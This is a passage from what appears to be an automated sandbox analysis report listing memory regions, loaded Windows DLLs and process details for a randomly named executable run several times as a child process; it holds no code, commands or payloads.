id = 4770 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4771 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4772 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4773 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4774 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4775 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4776 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4777 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4778 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4779 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4780 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4781 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4782 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4783 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5318 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5319 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5320 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5321 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5322 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5323 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5324 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 5325 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 119 os_tid = 0x708 Thread: id = 148 os_tid = 0x4f0 Process: id = "31" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd2e0000" os_pid = "0x814" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4077 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4078 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4079 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4080 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4081 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4082 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4083 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4084 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4085 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4086 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4087 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4088 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4089 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4090 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4091 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4092 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4409 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4410 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4411 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4412 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4413 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4414 start_va = 0x440000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4431 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4432 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4433 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4434 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4435 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4436 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 4794 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4795 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4796 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4797 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4798 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4799 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4800 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4801 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4802 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4803 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4804 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4805 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4806 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4807 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4808 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4809 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4810 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4811 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4812 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4813 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5351 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5352 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5353 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5354 start_va = 0x540000 end_va = 0x569fff monitored = 0 entry_point = 0x545680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5355 start_va = 0x780000 end_va = 0x907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 5356 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 120 os_tid = 0x784 Thread: id = 149 os_tid = 0xc14 Process: id = "32" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd3e5000" os_pid = "0x13a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4104 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4105 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4106 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4107 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4108 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4109 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4110 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4111 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4112 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4113 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4114 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4115 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4116 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4117 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4118 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4119 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4473 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 4474 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4475 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4476 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4477 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4478 start_va = 0x570000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4479 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4480 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4481 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4482 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4483 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4828 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4829 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4830 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4831 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4832 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 4833 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4834 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4835 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4836 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4837 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4838 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4839 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4840 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4841 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4842 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4843 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4844 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4845 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4846 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4847 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5381 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5382 start_va = 